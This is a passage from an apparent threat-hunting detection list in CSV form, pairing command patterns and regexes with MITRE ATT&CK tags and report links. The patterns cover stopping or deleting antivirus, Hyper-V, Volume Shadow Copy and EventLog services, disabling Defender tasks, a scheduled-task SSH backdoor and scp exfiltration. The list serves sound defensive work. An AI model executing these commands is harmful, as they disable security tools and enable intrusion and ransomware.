Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""vmicshutdown""*",".{0,1000}sc\sdelete\s\""vmicshutdown\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""vmictimesync""*",".{0,1000}sc\sdelete\s\""vmictimesync\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""vmicvss""*",".{0,1000}sc\sdelete\s\""vmicvss\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""VSApiNt""*",".{0,1000}sc\sdelete\s\""VSApiNt\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""wmms""*",".{0,1000}sc\sdelete\s\""wmms\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete 
""WRSVC""*",".{0,1000}sc\sdelete\s\""WRSVC\"".{0,1000}","greyware_tool_keyword","sc","deletes the Webroot service - disabling the antivirus","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete AVP18.0.0*",".{0,1000}sc\sdelete\sAVP18\.0\.0.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ekrn*",".{0,1000}sc\sdelete\sekrn.{0,1000}","greyware_tool_keyword","sc","deletes the ESET service","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete FirebirdGuardianDefaultInstance*",".{0,1000}sc\sdelete\sFirebirdGuardianDefaultInstance.{0,1000}","greyware_tool_keyword","sc","delete services related to the Firebird database ","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete FirebirdServerDefaultInstance*",".{0,1000}sc\sdelete\sFirebirdServerDefaultInstance.{0,1000}","greyware_tool_keyword","sc","delete services related to the Firebird database ","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete hvdswvc*",".{0,1000}sc\sdelete\shvdswvc.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete klbackupdisk*",".{0,1000}sc\sdelete\sklbackupdisk.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete klbackupflt*",".{0,1000}sc\sdelete\sklbackupflt.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete klflt*",".{0,1000}sc\sdelete\sklflt.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete klhk*",".{0,1000}sc\sdelete\sklhk.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete KLIF*",".{0,1000}sc\sdelete\sKLIF.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete klim6*",".{0,1000}sc\sdelete\sklim6.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete klkbdflt*",".{0,1000}sc\sdelete\sklkbdflt.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete klmouflt*",".{0,1000}sc\sdelete\sklmouflt.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete klpd*",".{0,1000}sc\sdelete\sklpd.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete kltap*",".{0,1000}sc\sdelete\skltap.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete KSDE1.0.0*",".{0,1000}sc\sdelete\sKSDE1\.0\.0.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete MBAMProtection*",".{0,1000}sc\sdelete\sMBAMProtection.{0,1000}","greyware_tool_keyword","sc","stop AV script","T1562.001 - T1489","TA0005 - TA0007","N/A","Snatch","Defense 
Evasion","https://thedfirreport.com/wp-content/uploads/2023/12/19208-013.png","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete MBAMService*",".{0,1000}sc\sdelete\sMBAMService.{0,1000}","greyware_tool_keyword","sc","stop AV script","T1562.001 - T1489","TA0005 - TA0007","N/A","Snatch","Defense Evasion","https://thedfirreport.com/wp-content/uploads/2023/12/19208-013.png","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ntrtscan*",".{0,1000}sc\sdelete\sntrtscan.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete nvspwmi*",".{0,1000}sc\sdelete\snvspwmi.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ofcservice*",".{0,1000}sc\sdelete\sofcservice.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete storflt*",".{0,1000}sc\sdelete\sstorflt.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete TmCCSF*",".{0,1000}sc\sdelete\sTmCCSF.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete TmFilter*",".{0,1000}sc\sdelete\sTmFilter.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete TMiCRCScanService*",".{0,1000}sc\sdelete\sTMiCRCScanService.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete tmlisten*",".{0,1000}sc\sdelete\stmlisten.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete TMLWCSService*",".{0,1000}sc\sdelete\sTMLWCSService.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete TmPreFilter*",".{0,1000}sc\sdelete\sTmPreFilter.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete TmProxy*",".{0,1000}sc\sdelete\sTmProxy.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro 
services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete TMSmartRelayService*",".{0,1000}sc\sdelete\sTMSmartRelayService.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete tmusa*",".{0,1000}sc\sdelete\stmusa.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete vmicguestinterface*",".{0,1000}sc\sdelete\svmicguestinterface.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete vmicheartbeat*",".{0,1000}sc\sdelete\svmicheartbeat.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete vmickvpexchange*",".{0,1000}sc\sdelete\svmickvpexchange.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete 
vmicrdv*",".{0,1000}sc\sdelete\svmicrdv.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete vmicshutdown*",".{0,1000}sc\sdelete\svmicshutdown.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete vmictimesync*",".{0,1000}sc\sdelete\svmictimesync.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete vmicvss*",".{0,1000}sc\sdelete\svmicvss.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete VSApiNt*",".{0,1000}sc\sdelete\sVSApiNt.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete VSS*",".{0,1000}sc\sdelete\sVSS.{0,1000}","greyware_tool_keyword","sc","deleting the Volume Shadow Copy Service","T1490 - T1070.004 - T1562.002","TA0005 - TA0040","N/A","Snatch","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete 
wmms*",".{0,1000}sc\sdelete\swmms.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete WRSVC*",".{0,1000}sc\sdelete\sWRSVC.{0,1000}","greyware_tool_keyword","sc","deletes the Webroot service - disabling the antivirus","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc qtriggerinfo RemoteRegistry*",".{0,1000}sc\sqtriggerinfo\sRemoteRegistry.{0,1000}","greyware_tool_keyword","sc","start the RemoteRegistry service without Admin privileges","T1569.002","TA0004 ","N/A","Snatch","Defense Evasion","https://twitter.com/splinter_code/status/1715876413474025704","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A" "*sc start RemoteRegistry*",".{0,1000}sc\sstart\sRemoteRegistry.{0,1000}","greyware_tool_keyword","sc","start the RemoteRegistry service without Admin privileges","T1569.002","TA0004 ","N/A","Snatch","Defense Evasion","https://twitter.com/splinter_code/status/1715876413474025704","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A" "*sc stop eventlog*",".{0,1000}sc\sstop\seventlog.{0,1000}","greyware_tool_keyword","sc","Stop EventLog service","T1489","TA0005","N/A","Snatch","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc stop MBAMProtection*",".{0,1000}sc\sstop\sMBAMProtection.{0,1000}","greyware_tool_keyword","sc","stop AV script","T1562.001 - T1489","TA0005 - TA0007","N/A","Snatch","Defense Evasion","https://thedfirreport.com/wp-content/uploads/2023/12/19208-013.png","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc 
stop MBAMService*",".{0,1000}sc\sstop\sMBAMService.{0,1000}","greyware_tool_keyword","sc","stop AV script","T1562.001 - T1489","TA0005 - TA0007","N/A","Snatch","Defense Evasion","https://thedfirreport.com/wp-content/uploads/2023/12/19208-013.png","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc stop Sophos File Scanner Service*",".{0,1000}sc\sstop\sSophos\sFile\sScanner\sService.{0,1000}","greyware_tool_keyword","sc","stop AV","T1562.001 - T1489","TA0005 - TA0007","N/A","Snatch","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc.exe stop *Sophos File Scanner Service*",".{0,1000}sc\.exe\sstop\s.{0,1000}Sophos\sFile\sScanner\sService.{0,1000}","greyware_tool_keyword","sc","stop AV","T1562.001 - T1489","TA0005 - TA0007","N/A","Snatch","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc.exe stop bits*",".{0,1000}sc\.exe\sstop\sbits.{0,1000}","greyware_tool_keyword","sc","Stop Bits service","T1489","TA0005","N/A","Snatch","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*sc.exe stop eventlog*",".{0,1000}sc\.exe\sstop\seventlog.{0,1000}","greyware_tool_keyword","sc","Stop EventLog service","T1489","TA0005","N/A","Snatch","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*schtasks /Change /TN ""Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh"" /Disable*",".{0,1000}schtasks\s\/Change\s\/TN\s\""Microsoft\\Windows\\ExploitGuard\\ExploitGuard\sMDM\spolicy\sRefresh\""\s\/Disable.{0,1000}","greyware_tool_keyword","schtasks","disable scheduled tasks related to Windows Defender","T1562.001","TA0005","N/A","APT3 - Kimsuky - BRONZE BUTLER","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*schtasks /Change /TN ""Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance"" /Disable*",".{0,1000}schtasks\s\/Change\s\/TN\s\""Microsoft\\Windows\\Windows\sDefender\\Windows\sDefender\sCache\sMaintenance\""\s\/Disable.{0,1000}","greyware_tool_keyword","schtasks","disable scheduled tasks related to Windows Defender","T1562.001","TA0005","N/A","APT3 - Kimsuky - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*schtasks /Change /TN ""Microsoft\Windows\Windows Defender\Windows Defender Cleanup"" /Disable*",".{0,1000}schtasks\s\/Change\s\/TN\s\""Microsoft\\Windows\\Windows\sDefender\\Windows\sDefender\sCleanup\""\s\/Disable.{0,1000}","greyware_tool_keyword","schtasks","disable scheduled tasks related to Windows Defender","T1562.001","TA0005","N/A","APT3 - Kimsuky - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*schtasks /Change /TN ""Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan"" /Disable*",".{0,1000}schtasks\s\/Change\s\/TN\s\""Microsoft\\Windows\\Windows\sDefender\\Windows\sDefender\sScheduled\sScan\""\s\/Disable.{0,1000}","greyware_tool_keyword","schtasks","disable scheduled tasks related to Windows Defender","T1562.001","TA0005","N/A","APT3 - Kimsuky - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*schtasks /Change /TN ""Microsoft\Windows\Windows Defender\Windows Defender Verification"" 
/Disable*",".{0,1000}schtasks\s\/Change\s\/TN\s\""Microsoft\\Windows\\Windows\sDefender\\Windows\sDefender\sVerification\""\s\/Disable.{0,1000}","greyware_tool_keyword","schtasks","disable scheduled tasks related to Windows Defender","T1562.001","TA0005","N/A","APT3 - Kimsuky - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*schtasks /query /v /fo LIST*",".{0,1000}schtasks\s\/query\s\/v\s\/fo\sLIST.{0,1000}","greyware_tool_keyword","schtasks","view detailed information about all the scheduled tasks.","T1053.005 - T1082","TA0004 - TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*schtasks.exe /create /sc * /tr ""%programdata%\sshd\sshd.exe -f %programdata%\sshd\config\sshd_config\keys\id_rsa -N -R * -o StrictHostKeyChecking=no -o *",".{0,1000}schtasks\.exe\s\/create\s\/sc\s.{0,1000}\s\/tr\s\""\%programdata\%\\sshd\\sshd\.exe\s\-f\s\%programdata\%\\sshd\\config\\sshd_config\\keys\\id_rsa\s\-N\s\-R\s.{0,1000}\s\-o\sStrictHostKeyChecking\=no\s\-o\s.{0,1000}","greyware_tool_keyword","schtasks","SSH backdoor creation with schtasks","","TA0003 - TA0011","N/A","N/A","Persistence","https://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*schtasks.exe /create /sc minute /mo 1 /tn * /rl highest /np /tr *\sshd\sshd.exe -f *\sshd\config\sshd_config*",".{0,1000}schtasks\.exe\s\/create\s\/sc\sminute\s\/mo\s1\s\/tn\s.{0,1000}\s\/rl\shighest\s\/np\s\/tr\s.{0,1000}\\sshd\\sshd\.exe\s\-f\s.{0,1000}\\sshd\\config\\sshd_config.{0,1000}","greyware_tool_keyword","schtasks","SSH backdoor creation with schtasks","","TA0003 - TA0011","N/A","N/A","Persistence","https://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*scp * 
*@*:*",".{0,1000}scp\s.{0,1000}\s.{0,1000}\@.{0,1000}\:.{0,1000}","greyware_tool_keyword","scp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*scp *@*:* *",".{0,1000}scp\s.{0,1000}\@.{0,1000}\:.{0,1000}\s.{0,1000}","greyware_tool_keyword","scp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*:8040/SetupWizard.aspx*",".{0,1000}\:8040\/SetupWizard\.aspx.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Control\SafeBoot\Network\ScreenConnect Client (*",".{0,1000}\\CurrentControlSet\\Control\\SafeBoot\\Network\\ScreenConnect\sClient\s\(.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Services\ScreenConnect 
*",".{0,1000}\\CurrentControlSet\\Services\\ScreenConnect\s.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Documents\ConnectWiseControl\Files*",".{0,1000}\\Documents\\ConnectWiseControl\\Files.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\InventoryApplicationFile\screenconnect.cl*",".{0,1000}\\InventoryApplicationFile\\screenconnect\.cl.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\InventoryApplicationFile\screenconnect.wi*",".{0,1000}\\InventoryApplicationFile\\screenconnect\.wi.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD 
